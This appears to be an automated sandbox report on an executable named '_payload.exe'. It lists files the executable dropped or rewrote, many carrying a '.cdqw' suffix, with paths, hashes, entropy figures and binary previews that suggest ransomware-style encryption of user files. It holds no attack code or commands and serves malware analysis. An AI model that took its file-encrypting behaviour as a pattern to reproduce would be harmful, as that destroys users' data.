                                                                                                                                                                      Preview:[{000,...H..~..@....SW...g..0.d.t|&...&(..](..w..........t.?.r2'..W^.../.Ot.(......AT....K.o'..m......*$.[}.P.......5V.&)...3......>.....n..%p.{.|....;........Y.l.v.....f.=....$3..u................L....E.}p.vl.Df.R..[.8.F..i._..U..e..b....J5Z...V..k...".....s.YMhK.0 S.2G.........].jT..;...:.1.#.hC2N.......e.$..g.T.A5.0).....x..\!Zi.Z-...kw#.dGX.5QK...k.W.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Favorites\NYTimes.url

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                      Entropy (8bit):7.459370970563058
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:mC78YvHlLCBQQEFUzii/RP1QXNuaWWaJSUdNcii9a:mC78YvF6QQE6zLaXNu3c2bD
                                                                                                                                                                      MD5:A746616BCBE78536E5DF11F6D90C695D
                                                                                                                                                                      SHA1:8345FA59A1D1909F1D980F7C77CCE2229A465663
                                                                                                                                                                      SHA-256:1AAE93C8245543D02F733232152B77337711994963B9264305489B93D2C13788
                                                                                                                                                                      SHA-512:594824D1E924857A6068D5F7569BDADD0DB40218775E650112EA3D845AA70B5B02C93913922A0F723DA52EA1018AD549240184BD7BF1606237913799C800737F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[{000....v..%....(.f.6./5.Q..bX..q.rp0."v..^9.}......>"..!....s+.m.....'.r.s...d/.......i..i.:..Mb./.z....q...9..EU.."...J..<?b.1B......_^..b.c...p....V0,.....g..G.`.\....#o.....0..[....41..1+...k.h..Q.V.W`.9...-.=....!BT...3.O..A....]0.ont}i^...tm.q.h.olk.I.....IJ.+..8....o."pS........5...>..:/..3K..=.../..4R.../..t..5.!~.(f.kUS4.F..S?.. .L.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Favorites\NYTimes.url.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                      Entropy (8bit):7.459370970563058
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:mC78YvHlLCBQQEFUzii/RP1QXNuaWWaJSUdNcii9a:mC78YvF6QQE6zLaXNu3c2bD
                                                                                                                                                                      MD5:A746616BCBE78536E5DF11F6D90C695D
                                                                                                                                                                      SHA1:8345FA59A1D1909F1D980F7C77CCE2229A465663
                                                                                                                                                                      SHA-256:1AAE93C8245543D02F733232152B77337711994963B9264305489B93D2C13788
                                                                                                                                                                      SHA-512:594824D1E924857A6068D5F7569BDADD0DB40218775E650112EA3D845AA70B5B02C93913922A0F723DA52EA1018AD549240184BD7BF1606237913799C800737F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[{000....v..%....(.f.6./5.Q..bX..q.rp0."v..^9.}......>"..!....s+.m.....'.r.s...d/.......i..i.:..Mb./.z....q...9..EU.."...J..<?b.1B......_^..b.c...p....V0,.....g..G.`.\....#o.....0..[....41..1+...k.h..Q.V.W`.9...-.=....!BT...3.O..A....]0.ont}i^...tm.q.h.olk.I.....IJ.+..8....o."pS........5...>..:/..3K..=.../..4R.../..t..5.!~.(f.kUS4.F..S?.. .L.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Favorites\Twitter.url

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                      Entropy (8bit):7.414719121213092
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:wQcZYUehFCu4zT+/zIW7D8CcNz5s+yQwv+uTF00okvSUdNcii9a:wfZYfhCzxW7D8TNq+yQk+uR0bH2bD
                                                                                                                                                                      MD5:3621DCCE071322A21018DDAC90F4C22E
                                                                                                                                                                      SHA1:D7887E798B03FF7102BDA16D1D84619F03CAAD0B
                                                                                                                                                                      SHA-256:3A2ACE6CE01BDCCB6667902B057826F5A1F7D1D073E9D3845CC42ABFEB3AC6E8
                                                                                                                                                                      SHA-512:E7E5D5F1040642BC7752E848DEEB61434789FDED4FAB4DABA77231CFFB177D335FC28E1E9EFA7DA0A4678555EE9543AA72D9A9B2E80C868FB08946A2DFD1571D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[{000.#8Ou=..[..F.!..09.iR.=6..n....*.C.&..9..ex.ea..O:..g..y....3..M.$.q..st...cr%...`.......W.!..l9....+9..$..;.Rb.......".}S-.vE..wwV.....h...q3..z.... ...-.eI..{......5A..._...\..V....o.^....-....D..+.......au.v^...XZ..#A...*i..5....)..%Q.....:..*@M..:....j.0.43..0...p...o.E...........d..Y.......xDg..WeZQ6.WS.I..KY.w....;..._..g. 03...H....2u.cq.bMmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Favorites\Twitter.url.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                      Entropy (8bit):7.414719121213092
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:wQcZYUehFCu4zT+/zIW7D8CcNz5s+yQwv+uTF00okvSUdNcii9a:wfZYfhCzxW7D8TNq+yQk+uR0bH2bD
                                                                                                                                                                      MD5:3621DCCE071322A21018DDAC90F4C22E
                                                                                                                                                                      SHA1:D7887E798B03FF7102BDA16D1D84619F03CAAD0B
                                                                                                                                                                      SHA-256:3A2ACE6CE01BDCCB6667902B057826F5A1F7D1D073E9D3845CC42ABFEB3AC6E8
                                                                                                                                                                      SHA-512:E7E5D5F1040642BC7752E848DEEB61434789FDED4FAB4DABA77231CFFB177D335FC28E1E9EFA7DA0A4678555EE9543AA72D9A9B2E80C868FB08946A2DFD1571D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[{000.#8Ou=..[..F.!..09.iR.=6..n....*.C.&..9..ex.ea..O:..g..y....3..M.$.q..st...cr%...`.......W.!..l9....+9..$..;.Rb.......".}S-.vE..wwV.....h...q3..z.... ...-.eI..{......5A..._...\..V....o.^....-....D..+.......au.v^...XZ..#A...*i..5....)..%Q.....:..*@M..:....j.0.43..0...p...o.E...........d..Y.......xDg..WeZQ6.WS.I..KY.w....;..._..g. 03...H....2u.cq.bMmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Favorites\Youtube.url

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                      Entropy (8bit):7.481120754396402
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:KDcmEIP6n8BMhv9bEp7j1RLaFwPcVzyj0YNlkTSUdNcii9a:Yk8cvojzOFnCke2bD
                                                                                                                                                                      MD5:E87340FA24BB3924436983A1696C59DB
                                                                                                                                                                      SHA1:085D5FCD005041BE9FE7B743DA5CDAABF3CBCB0C
                                                                                                                                                                      SHA-256:03F857895E35B9C71FDAADFA3363BBFEF5BA7635273D07EB13219C4EA74FE496
                                                                                                                                                                      SHA-512:CCE255B35AB84867361F17A5E24BC49B1F7F6737BCE5A0051F02A53B16B7788FFE872A92B36A96808AD6890F08033ABC5AC027723B6227E8874DC8F66939D897
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[{000.g<...H.}44!..,..SfX..'55p..5.... d.\.......Y./.sOO.w....d%Ud..Qi..Bu:..,.KV%.f.e.^..'^.%Z......"...).l.O5s..0.mU....n&u.b.l.|D.a..an.(..d6.S.K2..9y......b..l.'.V.\J.8o..\8r."..I.N][...m.\;.gyA|..+......i...gz~.I...Y>.Z.m...2:.)~.4K...n..@..{.u.UL.\.m... `.R.P?....I.N...t....N|.E.U..O..l.$)..Q.Ah..xC..*...A...!M..=...V...oD"....p..C....n.s...D......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Favorites\Youtube.url.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                      Entropy (8bit):7.481120754396402
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:KDcmEIP6n8BMhv9bEp7j1RLaFwPcVzyj0YNlkTSUdNcii9a:Yk8cvojzOFnCke2bD
                                                                                                                                                                      MD5:E87340FA24BB3924436983A1696C59DB
                                                                                                                                                                      SHA1:085D5FCD005041BE9FE7B743DA5CDAABF3CBCB0C
                                                                                                                                                                      SHA-256:03F857895E35B9C71FDAADFA3363BBFEF5BA7635273D07EB13219C4EA74FE496
                                                                                                                                                                      SHA-512:CCE255B35AB84867361F17A5E24BC49B1F7F6737BCE5A0051F02A53B16B7788FFE872A92B36A96808AD6890F08033ABC5AC027723B6227E8874DC8F66939D897
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[{000.g<...H.}44!..,..SfX..'55p..5.... d.\.......Y./.sOO.w....d%Ud..Qi..Bu:..,.KV%.f.e.^..'^.%Z......"...).l.O5s..0.mU....n&u.b.l.|D.a..an.(..d6.S.K2..9y......b..l.'.V.\J.8o..\8r."..I.N][...m.\;.gyA|..+......i...gz~.I...Y>.Z.m...2:.)~.4K...n..@..{.u.UL.\.m... `.R.P?....I.N...t....N|.E.U..O..l.$)..Q.Ah..xC..*...A...!M..=...V...oD"....p..C....n.s...D......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt23.lst.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:PostScript document text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1567
                                                                                                                                                                      Entropy (8bit):7.862274847292636
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:siO3NHbrNfkelnqhaIP2SHcjOKNKguoIAR63VttRD8OUKii7EDCtR0Jh2bD:dYNHb9blnqhaxS8j9N/O3jv3B7zR0J6D
                                                                                                                                                                      MD5:BF8D3C16940F858EC1BFADED12FFB6F1
                                                                                                                                                                      SHA1:F1A790830014514D352B8D8389B26B80198CA0C1
                                                                                                                                                                      SHA-256:3438C2C4B6DE2EE6731F3C5FB8D11C5947029E98554745A3537954514CFBBCBA
                                                                                                                                                                      SHA-512:9DAA6BDCA338ED221DF5235B24EDAC66FBA2236F27B169F3AEC4ACB7178C49A60F19F46C006E4EA4E8197464E1C195A11EB62A2D30A19BE662F39058B723CBA4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:%!Ado.M......._b..+........i....8.gg@...{.5O.NBm.]e..ai$.$.P.....6.b~.lp.../.Y..~{2d"..=.f..f...7._........_.L.....R....J....W3...,.....7.C.;.s.E..j.P3...Z..._.n7.....!1...Q.{:c.. ...{.6.;..u{..........H6W@...Y>..'..TA...b..Rl|........"..g`...i\Y<.e.-.EE7......Kw..I.....n?g.JvJ_...(p..T.#`...B.d......z.D.>2.W..C.U._a.R.....t.........2.~...B.{W..Y....Z...$..~.D}.|..on..>....|..Z..a...[.,t.q..+....@vAdW0...P...*..AF.:@. @.Q6.....j....^*.d...@$.r_.~..[!.m([.yy..E..i.......x h..!.H-.(...N..5...- <....*.Q...DU....9..f..].......~...T......D....mq.$..V.M...Z..v.A....|.P"L,.j[.L...Z~....&.........!....9CH....}RV.Z.....?.....D2........]..g...._...s.....g..vf#>.u . O".U.+...B.....D.e3..#.6h.;...M.....[...k..........d.....nI.......jX.....B.....9..U..Q...%......#..W.sgM.....p'....w.....3q.....O@>..A;y.."..............[...tu..r.M.n......lU=j<.N[.amq.4-....Z..M..._J..[.?.d.A.J..Z..}&.Z.3.T..v.J.[-..~..^93.F..L\F.,U..c..vq.g`.Q....4..'.o...UU

                                                                                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt23.lst.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:PostScript document text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):185433
                                                                                                                                                                      Entropy (8bit):7.877376962412137
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:viIRD54nWr+Chpu33YETwWyFaYnnDOyCMR9LeA2n5KcgaKqJCXE07ZmandGCyN2o:v3Tr+O8rTM9nZRVN25KUeXE07ZmandG1
                                                                                                                                                                      MD5:75DF56EDFB1B467E4649FB41D4E5E63F
                                                                                                                                                                      SHA1:720D48C60965A15EF1A6F6C7AF08AAB191E897E6
                                                                                                                                                                      SHA-256:2B1EB3376A9CE94B36EEC7E1D9450C9CB5AC7AC11BAFC3F32484D03216FCE013
                                                                                                                                                                      SHA-512:9E0A8235BAF2DD09B98B02D867104E110852BD8C7690BF4097A236AB5202B052D52A46A8820F82AA3ABEF6BCF7503CDB2665B890607546B087F39971ACF82F7F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:%!Ado>j.RMp.....[0...=.....b.kn...i.g].y.~..{u..b.7...t.[...`T.Y`S...Jm.....X.....c..\......,GW..l..~..r....p.[Cj:...t.m....$.....:4.6...B..B........gIV.cp<.b.JT..Z.Lkn7...&......s.Q>.'...,.........;k.....]...u....y'..x.)...u....k......%;[-Mk9.G.)..Y......N7.....c0>."...@...**.....<7.=F.....p}l.."...rqC...s..&.:......n.Ok 7..".......t.....B...Y........+....?....;S..uW.J....K.'.v6..x.!...G....<!.........YN"....F.....Yb.".Z4.t...<.......`...'..l.g%...DA...\Q....-..Pi.|...V.........I...{.DW....:b.Q.w..m.....[U`.....V...6?._....RG......4e..RiPQ...~?....SY.E......l%..F..0.kr.xW...8{M$+..^....Z...{"0.D.....AkQ#..._....N......Wk..UL...xu......s...$...=...O.e..O..!.V.j....n...o....!...a.....!.\...+............k.....}..`E.D.+.,>.+....}1...5.R...z..t.."..99.r....l4._k%...6.\.7.!b.4Z....p.......4.....).....f.[t./....*.tZ....O..'L...y...$Q...2n_.]f....{7....B..|.......z......{#.\.....M.;...x.T.Y9G..{a...[I...l!m.[....j......^.g.:......I...H&K.

                                                                                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\IconCacheAcro65536.dat.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):243530
                                                                                                                                                                      Entropy (8bit):6.822569033372759
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:S8w1EYKmC1Lhr7ZX/Ww8o2QwyKJ1tPUOcQIwlyzlNwaE2em8ZdOolNlnK:S85m8Lp7Mw/wJbtPM6rFC8ZVnK
                                                                                                                                                                      MD5:D0E9AF88C247E2DEB7BE3D68DC1724D5
                                                                                                                                                                      SHA1:007F510D7EABA2CA143AEB41F50689566F7A81E6
                                                                                                                                                                      SHA-256:E4DA7A7BFCF10047D645F9090B01E69827AE8D1B0DC75099BB59723824307342
                                                                                                                                                                      SHA-512:4E2E1E03A800D311EA5B073DF38CAF39EF990F8F8BB06859B3907C7FE82D1C67E701A63EF6434FE2B499BBB90EC6B9F66672CA6EF690398370AD46F611C19830
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Adobe]..8,q..%.Z).':..L.. ....?._>./.Mw.F.$.?....r.?.q.5..6......:..z..n.....aa.S.x...Q......:M[a~Vi;R..:tr...1...z....Ka..Yr.n2.4....Bv&.?..uJ8c.,.....h.....o5..(-fY..e..5.......R."..x........b..b1...F.b.?..?._.3."G.{J3.=...;+p....Z..I.+....+v...h(m]v>..A.w..e..L....S.......!./d....._.F>.......{..R..`0H.k...,.9U.[....<.I..V..P.].....Y.C....X..E.......Q,.N..{..............1...l.........A....1.:..NT..Y.....%.C.K........]..........W.....e-.....P0e...tN^}V.W...S...U........:...@..#Q..8.@f....9..NS......yc...V...6q.....e......W5...|..>..i.._gJk(J#..4...E...b.%.C..r...#...J<z.*.K...............4vjL.....C.....$.y.E.P..R.....&_`kL.....A....a'.EVb..K.gB.\...=XD.VM...>.5..2..o..mX.-.rF1...!.....g)...o.Xe,....;c..[...'."@.Z.:.&..X.;...0...%uiW..n..>...z...#d.........w..[&..W....^..y.8.?.n!...=%...M.....D...;...!..w.t...E...X.bG.....a.qP...&...W8.)4...6.R4...%jh...>..}.....Z..Mq..7..eG.zUl9.Y]O..q......B....}.<.......'h.b.@..F...D\..}..a.I.Z..

                                                                                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):67060
                                                                                                                                                                      Entropy (8bit):7.9972008239459
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:vJSeLuGvk4USpgAtAoUgpYRAD59Hf7hVDgcbQeVDNv+H6YG:MernUSpgWUQYRe9/73jbQCDNGZG
                                                                                                                                                                      MD5:3945C719A804A5B3EE35DF8A2B447D90
                                                                                                                                                                      SHA1:A650D80CE53D7B1E1D9CE12B2293D79D9C8D9A45
                                                                                                                                                                      SHA-256:337339B4B2B702E8069B3D28BAC03D622FF09EA92D844E4A159055F31A4DA2ED
                                                                                                                                                                      SHA-512:903AB9F8476D9AF3C8949BA8B032F5E426262D4544D2DDEEF0A653E42E1B688B1FCBE4DCAB5E70D9F82CC6322D25CB0BB8D2C5E2528797B85F1213F434B0FA86
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:4.397..........\...C...Y.W.\....Mt...G.`O.'..n..r...0..F..Z+B...jMfxI.9..pd...%.]...f..3.n..,......v/..ZHI.3~...QU..i.m..y.~....2..b.[P.....Y....j.k........^.5j.4/]sjy...~.~\.z.i./.`g.E_.gx.7....Ft....y'...1iR......ZQ.Yr....._...)....... .6..B.U.....J.4..?...5n.......WRfyAmM.F......>q[.e.T.r.h......V........T.x.x.7..e.X*.$..r.:#.>.......b..X.I.;g#.6.v...C. 4vV<{..."....:.UX...|...x..@{...H.8?Z.}`.@....H..?.{......J...Dri..--../. ..w..%.|..7...5....-...P..&........E...].@..&...csH.t....*...8....D..]^...GU.L6v...q.i..B..!..F..rh.....%'...%..k$.O........U.....$..{|.\.....{^.'.... .M...jB6u.q...f...*.....(..%..6...0.k_..F....X..g:...J.:/s.......x.5...}.{z.@.....q...-98..G..]I.x;.V.6.`.^..(..SR1..Wa...S{.g>...!u..&d......l.&9GW.p.c......*.S].P6..*.`.H.p...x.N...A.oM..&..[.!...7.....c.........*....4..C.......v>."W...f..../..+..0...;X...S24.c...%..3..5..{.z(...7j...u....t..J..H.H.....~..B....r.QXb.{V...ye..6.^.1i..V..{M..i.vq.... T....@h.B...Z9r...

                                                                                                                                                                      C:\Users\user\Local Settings\Adobe\Color\ACECache11.lst.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):932
                                                                                                                                                                      Entropy (8bit):7.781382781715273
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Gd4DGIMN+PEPulEozb+hAupxcQxx32xtu2bD:24DGIePuZb++8cQxQlD
                                                                                                                                                                      MD5:0752A5CC0C676B890BA1FA2303EB8EBC
                                                                                                                                                                      SHA1:9D5EBFBA106677A76A90EFAEAD721DE625818DA0
                                                                                                                                                                      SHA-256:285D48CCEF8E1B4DCE08D10247AABC0FB28E97542AD3ABD8EF5AF421BEA2D28C
                                                                                                                                                                      SHA-512:12A6901B4E92367028DD6EF745116C1365558E4045C1E3AE81E28956F6E62A22F9F5561B2FF04F8726FA36BF7FA7D9943DCA6BB84EFCB21A6E6AE175F1B1D88F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:CPSA....{.CL,,...t.7...."..|.i.F.<U...o.F...zYV.o3.r.....F..<E%O.!..P=M.!...@1..f x.U..3.r.OO.._o.......3..G%Yn..<....T....+.. ......i..D.....b..".%...p. ...w...W_..... ..).W...1...JH.....k..A...{0.r.(.u.%..|:].=..yhA.x2......D..6.U.c,....}....w ...FB8m./.....=4..4S.>)?Y.O.F.vZ...|.-.%..~Z..$.5d.\U.[...).a...YI.#>......0:..{...F..h((.z..w..Lg2_..lc...Qv8.-d...A.<...l/8..-:z?cW.....A....v..........J.i.40s.8..o...}.n}:....w..._....=/kiWI-.6....Z...]m.'.....-'..v......7.....CRq3w1,B......y.n....q...}..%"4M3JL.1..,.=~..}....j.5.....o.:G`.../.lJ..N.O.T...I.iA.)F..r8)0v#.....RR.7..?.+.8.b.....g.\b......&T...I2T....R....Z..iVqK..1b..$j@z|4.......^...u...t\...r.....w?!Nk....4..w!E...K5.8.H0.u....o......<8%<.p........AvH...1..#.rH(..f.........@|.....9g.....Y20......YzY...K,.$M.b.R.z..K.s]....?...W[.5,..v.m..i.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jcp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.973945456374672
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:djtKtKS1jaIsidxveUFhGcscL9YK0tcsT7bPiCYc:djtiLaIHvyc59YK0aWbOc
                                                                                                                                                                      MD5:A195C993872ABA9B09A31074B7D777DE
                                                                                                                                                                      SHA1:20E231D5492D28E6A62394DA48D20D7B132BDDF2
                                                                                                                                                                      SHA-256:A13431D5DB805B2E49FF265AE466E1617251A9D22E281F570839E082999D686D
                                                                                                                                                                      SHA-512:348D9E677719AF59090B6D50355DC629F5DB4F3EFF953F2A8FCE8AE3AC6D3AD6C04E6A97B471495B3BBA609E5C6A14CC2AE21DA30B9CB5E3607C58BD63267BC4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.M.#..........,.....Tjp7..t......p....<.....+...7~.&.-.L...<...W....yM.q_...U@.5{l..k^...XJ..m.T<.....^U..p.f.n....+..h.U.7...~.9.[y\'.^...s.."+.`u%....Cm.oEb....cta..).?.....O.D5..~X(.q.6VFH.<V.CUdY.f...3...!WS.o....ez...8Z..Q|.20.5...6o.XO.q.+d..2..^.w..;o...e.E.........f.Qk..G.g.`...c..T...:..H.5.?..+w08........D..c$q7.[Z4..GS,3...D(.E+M.*l.9..)....s$.E.`..c'...u.V..1w.)o..L5.....y;..cv......7.:.....".....Oj.&..NB.L....S.b...2...E...W.......L.)=\...i..Pwi..?H..n......$"....z.~)A.{.4..aa.C.C.]Quj.I....3......4P..F.+.S.|R.[......j...C.Z.1...lsUd.J.a.u.u..U..y.9.........XLp,..ss...I+b.d......M....,8nd......g2~..lh.yU.5..;..q..|..&yDB....%...f.b0f...W.q..}..L+4....)CP..Sy.....k.B}.surC!.I......."....\..C.K.T....J.#...).].1...9.........Zd'.Q.F. .O..d..:g.$.c..5.\...0G{.).^...."au..p.. .g.RS.Bm].....s...\.,0.y(...]!...V..m...wA...L......l..N..\N0...,L...`XUc.7....G....~.1.........:jF...+.....j..<.x.}8.n[.r.^z..&..g.]......U.,...l..?I.5.5......h

                                                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jtx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3146062
                                                                                                                                                                      Entropy (8bit):1.7333570996691994
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:L+6l6NyFKkxCToPiZU3J5OdZToauvosllo3agO/qqv4RROYdVbtzFnrG5J5qh+AA:SPYKk4miZUZ5AVoauvoMfCdYS2
                                                                                                                                                                      MD5:9827D1EDE346806796A79E6870DA43BF
                                                                                                                                                                      SHA1:8007E98CD1B5A4376DF7661DD8F0C7539E6631FC
                                                                                                                                                                      SHA-256:CF6DF77ABCB8A9B487A106C22E9ABC241D94DF4464293E7CFAE4F4F0D86AFD92
                                                                                                                                                                      SHA-512:A16A69AB60E4441ACD68E08F39ABE107CDF9DD13F22914788FFD072EB044A09712F87330B8AEA4AFA8DB6584C83C150EEC2D2ADA3E808ADBA1B37FAD92CC42D7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...?.j..G....>B...{h.,4.c..0.4.....2...`.....?...Y..<Ef....+...^.Af...x`..^....8.E..;.7..+.*...s_..1E..V..%.....8..l....,A.U...0.s..p..9.....M.......5;\...a#..2.....G....QU.NI.dF.V.ID.1.R.U..f|....;a.Z..gc....IC...I.L:.#4J..4v.e.....w{b..f..).t..IOr.T...;..r....h..c.'.......i...r.>.9R.W.;.Q..s{.b.y.f)....:..e`v*!..?e..$.....Z.(iA.I.&A.Vx2....C.T.Ut2..aE .Y..........f.Z[.g...<.z.a(..`...L..P..N..q.G~....@y.jz.......n.*.....C.e.3sf..'.B.89.Q.F1^....c..{.5>.]..$...i..n.....]E..............2..#q..58.R..j..q....W`f.eD.....f...r..V...j....W.l1...x?t..)...c.B.A.[..).......m..B.A:?.A..1.hr.+.4.C.qcBD.4.u....W.......]z.1G.s..~[..E..rW&..5.(TlI...25&...........i.N.:..QP~..d...I...Q.......4H8...4HJ).p.....L..,....+3..w..9z..:.l....P..6.z....<....:/<n.I.D..4.9c.lU.D.18~._._.......6`....<...^..?..?..M.&S.........R.~..7...V...MZ...1.c....X..........H.3...E2...Y._.H......d-<..!..*.WVEs.......3...B.....?.<'..?.Q2.rQm..)....!.m..Sp..K._u."..,...r/+q@.(...-

                                                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3146062
                                                                                                                                                                      Entropy (8bit):0.6705479184420877
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:J2BPkU7J71ptMQpYxQ7Hnv8UfIffnGHOfrFM9a2H0dFq2GMDY/ysmT62bqAVS:J2lkUXDMlQ7zIWufrq9dUzY/CT62bqsS
                                                                                                                                                                      MD5:44427B9357BD2A403F47205E89ABAF12
